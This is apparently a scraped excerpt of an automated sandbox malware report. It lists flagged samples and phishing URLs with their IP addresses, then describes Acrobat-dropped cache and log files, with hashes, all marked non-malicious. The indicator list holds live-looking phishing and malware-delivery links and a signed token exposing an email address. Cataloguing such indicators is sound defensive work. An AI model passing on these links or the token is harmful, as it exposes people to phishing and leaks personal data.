                                                                                                                                                                                                                                                                                          kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                                                                                          gZzI6gTYn4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                                                                                          U6b3tLFqN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                                                                                          zlsXub68El.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                                                                                          0UB3FIL25c.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                                                                                          DIGITALOCEAN-ASNUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                                                                          nBjauMrrmC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                          • 167.172.228.26
                                                                                                                                                                                                                                                                                          https://madresbancolombia.mpache.co/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 104.131.25.167
                                                                                                                                                                                                                                                                                          https://bafybeidqje3fyzla6ot5zhmvxwb5ow3jropcax5pzesf3jh2tqryi6rxma.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 142.93.100.104
                                                                                                                                                                                                                                                                                          http://ecometanexus.unids.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 142.93.100.104
                                                                                                                                                                                                                                                                                          http://aprackspace.serveusers.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 157.230.23.237
                                                                                                                                                                                                                                                                                          http://login-ourtime.members-datings.workers.dev/v3/aboutonlinedatingGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 138.197.235.123
                                                                                                                                                                                                                                                                                          https://uhcdenal.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 206.189.225.178
                                                                                                                                                                                                                                                                                          https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 165.227.251.217
                                                                                                                                                                                                                                                                                          https://google.be/amp/enjin-io.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 159.89.115.175
                                                                                                                                                                                                                                                                                          AMAZON-AESUShttps://changeofscene.ladesk.com/605425-Secure-Business-DocumenGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 18.234.10.85
                                                                                                                                                                                                                                                                                          https://smallpdf.com/sign-pdf/document#data=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczovL2VzaWduLnNtYWxscGRmLXN0YWdpbmcuY29tIiwic3ViIjoiNjE3MmQyMzMtODcyNy00M2NhLWI1NjQtYjgwZDUyZjYxYmVjIiwiYXVkIjpbImVzaWduIl0sImV4cCI6MTcyODYzODEyMCwibmJmIjoxNzI3NDI4NTIwLCJpYXQiOjE3Mjc0Mjg1MjAsImp0aSI6IjYxNzJkMjMzLTg3MjctNDNjYS1iNTY0LWI4MGQ1MmY2MWJlYyIsInBheWxvYWQiOnsiZW52ZWxvcGVfaWQiOiI2ZWRlMzFjZS00Mzc2LTQwYzItYjJjNy1jMDc2Y2M3MjY4NjIiLCJzaWduX3JlcXVlc3RfaWQiOiI2MTcyZDIzMy04NzI3LTQzY2EtYjU2NC1iODBkNTJmNjFiZWMiLCJ0b2tlbl90eXBlIjoibm90aWZpY2F0aW9uIiwidXNlcl9lbWFpbCI6ImNoYW8ud3VAd3JpLm9yZyIsInVzZXJfZmlyc3RuYW1lIjoiY2hhby53dUB3cmkub3JnIiwidXNlcl9sYXN0bmFtZSI6ImNoYW8ud3VAd3JpLm9yZyJ9fQ.UX67GiHBKgjV8XyH-SFTt_KgB2I_q2j9cbGTSqbzRvY&eid=6ede31ce-4376-40c2-b2c7-c076cc726862&esrt=6172d233-8727-43ca-b564-b80d52f61becGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 3.5.66.42
                                                                                                                                                                                                                                                                                          https://www.vossloh-events.com/EMOS/Login.aspx?ReturnUrl=%2femosGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 3.220.53.221
                                                                                                                                                                                                                                                                                          https://jbrizuelablplegal.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 34.195.119.102
                                                                                                                                                                                                                                                                                          http://home-103607.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 50.19.89.137
                                                                                                                                                                                                                                                                                          https://d2y5b082yylhnc.cloudfront.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 3.5.28.155
                                                                                                                                                                                                                                                                                          https://tiktok8.biz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 3.5.27.214
                                                                                                                                                                                                                                                                                          http://bao.usdt888.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 35.171.58.3
                                                                                                                                                                                                                                                                                          http://home-101829.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 50.19.89.137
                                                                                                                                                                                                                                                                                          http://sky-102142.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 50.19.89.137
                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                          28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fcasaderestauraciononline.com%2Fholy%2Findexsyn1.html%23cmltYS5hbWV1ckBjYXRhbGluYW1hcmtldGluZy5mcg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          https://changeofscene.ladesk.com/605425-Secure-Business-DocumenGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          https://careeligibility.vercel.app/chubedanGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          https://sci-hub.tw/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          http://webmail-7ba16a93.elod.com.br/?id=voiceofdesign.frGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          http://specsavers.definition-ai.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                                                                                          • 20.114.59.183
                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):300
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.207657596053192
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:PE0ELcBBUVq2PcNwi2nKuAl9OmbnIFUt82E0ELcT0gZmw+2E0ELcfYH0IkwOcNwM:PEvcBevLZHAahFUt82Evc5/+2EvcQv5h
                                                                                                                                                                                                                                                                                          MD5:B6043CBB7ED6BAAA74594A67B1E112D8
                                                                                                                                                                                                                                                                                          SHA1:940D63AF0E52809DCFDD3751D93CCC8110C47044
                                                                                                                                                                                                                                                                                          SHA-256:0E47AF93A3BA508703D8B9D64D1B9B51570FDAC04501516FD15F9AB375F49C14
                                                                                                                                                                                                                                                                                          SHA-512:10B0EA0F9CFB9072383BAA6F01DD49404B45604456A42A893828477BF6E2DEEFD113DDCE03B8D7BDF5BB7F56F150096FD3491E61DE21A14CFB7ECC9102271239
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Preview:2024/09/27-10:40:21.987 1db4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/27-10:40:21.990 1db4 Recovering log #3.2024/09/27-10:40:21.991 1db4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):300
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.207657596053192
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:PE0ELcBBUVq2PcNwi2nKuAl9OmbnIFUt82E0ELcT0gZmw+2E0ELcfYH0IkwOcNwM:PEvcBevLZHAahFUt82Evc5/+2EvcQv5h
                                                                                                                                                                                                                                                                                          MD5:B6043CBB7ED6BAAA74594A67B1E112D8
                                                                                                                                                                                                                                                                                          SHA1:940D63AF0E52809DCFDD3751D93CCC8110C47044
                                                                                                                                                                                                                                                                                          SHA-256:0E47AF93A3BA508703D8B9D64D1B9B51570FDAC04501516FD15F9AB375F49C14
                                                                                                                                                                                                                                                                                          SHA-512:10B0EA0F9CFB9072383BAA6F01DD49404B45604456A42A893828477BF6E2DEEFD113DDCE03B8D7BDF5BB7F56F150096FD3491E61DE21A14CFB7ECC9102271239
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Preview:2024/09/27-10:40:21.987 1db4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/27-10:40:21.990 1db4 Recovering log #3.2024/09/27-10:40:21.991 1db4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):344
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.157784680476849
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:PE0Ejyq2PcNwi2nKuAl9Ombzo2jMGIFUt82E0G/1Zmw+2E0GpRkwOcNwi2nKuAlx:PE9OvLZHAa8uFUt82EB1/+2EB54ZHAaU
                                                                                                                                                                                                                                                                                          MD5:63E25D9F0277B9DC031507DBD0378253
                                                                                                                                                                                                                                                                                          SHA1:065B1CF738FBA7DBD564F9CFE11DC7FACF4A15F2
                                                                                                                                                                                                                                                                                          SHA-256:EB7B0E7EA2844D3A29AD65ADA7144A79ED1FCE3C793E5DAF364E7AC03BD9CD1E
                                                                                                                                                                                                                                                                                          SHA-512:8E296D7952F5CE8F1CBD5BAB81C4551AA8C1FBAFE07E6F1B70F79C394F19AD0A509F952467743DBA7EEAF3C16B8D02A0587923785E6726B14D7A4ED696BF0885
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Preview:2024/09/27-10:40:22.095 1e94 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/27-10:40:22.097 1e94 Recovering log #3.2024/09/27-10:40:22.097 1e94 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):344
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.157784680476849
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:PE0Ejyq2PcNwi2nKuAl9Ombzo2jMGIFUt82E0G/1Zmw+2E0GpRkwOcNwi2nKuAlx:PE9OvLZHAa8uFUt82EB1/+2EB54ZHAaU
                                                                                                                                                                                                                                                                                          MD5:63E25D9F0277B9DC031507DBD0378253
                                                                                                                                                                                                                                                                                          SHA1:065B1CF738FBA7DBD564F9CFE11DC7FACF4A15F2
                                                                                                                                                                                                                                                                                          SHA-256:EB7B0E7EA2844D3A29AD65ADA7144A79ED1FCE3C793E5DAF364E7AC03BD9CD1E
                                                                                                                                                                                                                                                                                          SHA-512:8E296D7952F5CE8F1CBD5BAB81C4551AA8C1FBAFE07E6F1B70F79C394F19AD0A509F952467743DBA7EEAF3C16B8D02A0587923785E6726B14D7A4ED696BF0885
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Preview:2024/09/27-10:40:22.095 1e94 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/27-10:40:22.097 1e94 Recovering log #3.2024/09/27-10:40:22.097 1e94 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):546
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.95222463917855
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YHgLdv7DoqBWsB6um3RA8sqIhsBd2caq3QH7E4T3y:YALt75B7JsRdsqdJ3QH7nby
                                                                                                                                                                                                                                                                                          MD5:5D4B434099FC1D8793F491B0E5CA5644
                                                                                                                                                                                                                                                                                          SHA1:0CF78ED73F451662D303C7CB76DEC8E08B073484
                                                                                                                                                                                                                                                                                          SHA-256:BA0F4BB8F833F2D0D2DBF5443BF03649DF3BE680B844FA539DBBA63FF7F9100E
                                                                                                                                                                                                                                                                                          SHA-512:C77A280BBE6E43A3AB7BDE5EFEFDD623FE04B179EA4A728EEC12F27F236FC16F873B3D485FE299359CD9F154469B8C21CA613244D08AE4689A2BB99AF8F20C93
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":2,"broken_until":"1727448332","host":"chrome.cloudflare-dns.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372008034619254","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):475
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.969814904260269
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                                                                                                                                                                                                                                                          MD5:7BE9C8316EB1B7252CB363207744A145
                                                                                                                                                                                                                                                                                          SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                                                                                                                                                                                                                                                          SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                                                                                                                                                                                                                                                          SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):475
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.969814904260269
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                                                                                                                                                                                                                                                          MD5:7BE9C8316EB1B7252CB363207744A145
                                                                                                                                                                                                                                                                                          SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                                                                                                                                                                                                                                                          SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                                                                                                                                                                                                                                                          SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):475
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.969814904260269
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                                                                                                                                                                                                                                                          MD5:7BE9C8316EB1B7252CB363207744A145
                                                                                                                                                                                                                                                                                          SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                                                                                                                                                                                                                                                          SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                                                                                                                                                                                                                                                          SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4509
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.24181334514294
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPasj2OS8XiZ:CwNw1GHqPySfkcigoO3h28ytP3j28iZ
                                                                                                                                                                                                                                                                                          MD5:7E228EDDB7DCB12515C0F92520BE5DC6
                                                                                                                                                                                                                                                                                          SHA1:251E00AD03CA684B55554F5712C3FA445180593A
                                                                                                                                                                                                                                                                                          SHA-256:1918449F2E93B4C1C9371F592054285F3D8BD18304ED8A2109CE457DE388FBAC
                                                                                                                                                                                                                                                                                          SHA-512:5F6EBB866BADFFF9988404B72397576260B013BF95E1D106FE35E15CF15CAD768F0B1D262AA8D9DC3A627ADAB429DE9EFC10051BFF7BC370586128038E1689FE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1626132379998895
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:PE0IVQUyq2PcNwi2nKuAl9OmbzNMxIFUt82E0IC11Zmw+2E0I+cjlRkwOcNwi2nv:PEBQJvLZHAa8jFUt82Eu11/+2E6cjz5Y
                                                                                                                                                                                                                                                                                          MD5:C5026EABF9C992BB35E3490400AD9AE3
                                                                                                                                                                                                                                                                                          SHA1:CDB91F29AAFA436EC5325A362615F2AA00441BAF
                                                                                                                                                                                                                                                                                          SHA-256:3281EFA48531E38D4A30FA901196E34F15E9876DB3CEBDF7F8D0D4813770237E
                                                                                                                                                                                                                                                                                          SHA-512:51261CED99F1CBBFA8864FBD1BCE53F34CF9EB6D2DEFADC4A181F66C07B13A8016A8942CE3F19E79E577CECC81AC1E5D0B45DD211820D9B5076FEA6D2D1BE6D6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/09/27-10:40:22.905 1e94 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/27-10:40:22.911 1e94 Recovering log #3.2024/09/27-10:40:22.914 1e94 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1626132379998895
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:PE0IVQUyq2PcNwi2nKuAl9OmbzNMxIFUt82E0IC11Zmw+2E0I+cjlRkwOcNwi2nv:PEBQJvLZHAa8jFUt82Eu11/+2E6cjz5Y
                                                                                                                                                                                                                                                                                          MD5:C5026EABF9C992BB35E3490400AD9AE3
                                                                                                                                                                                                                                                                                          SHA1:CDB91F29AAFA436EC5325A362615F2AA00441BAF
                                                                                                                                                                                                                                                                                          SHA-256:3281EFA48531E38D4A30FA901196E34F15E9876DB3CEBDF7F8D0D4813770237E
                                                                                                                                                                                                                                                                                          SHA-512:51261CED99F1CBBFA8864FBD1BCE53F34CF9EB6D2DEFADC4A181F66C07B13A8016A8942CE3F19E79E577CECC81AC1E5D0B45DD211820D9B5076FEA6D2D1BE6D6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/09/27-10:40:22.905 1e94 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/27-10:40:22.911 1e94 Recovering log #3.2024/09/27-10:40:22.914 1e94 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):65110
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.596681840138938
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:3SIhAlH56H8z0hhxRjgfQXr8Rkflvpn22ZKZsa1iIrbe0:PY7
                                                                                                                                                                                                                                                                                          MD5:D9D12A8DDAFA900EE4C5124AAC4E3F19
                                                                                                                                                                                                                                                                                          SHA1:5317854BDFDF7050E0CA1C08A8C48147CB8088F5
                                                                                                                                                                                                                                                                                          SHA-256:80B839150DF3A8E607DE9D1D092805C90E9EF23BAD748919618259C3CFCCC137
                                                                                                                                                                                                                                                                                          SHA-512:385F87F52E3225BCD6B8B1FB482784DBD7791694E771D6F1708ACA511E574C30882D0F9DB86E4D15794E433E6265AB2D6C52DC046D68590A59AAAB1C6F422FDD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:BMV.......6...(...k...h..... .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ff................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):86016
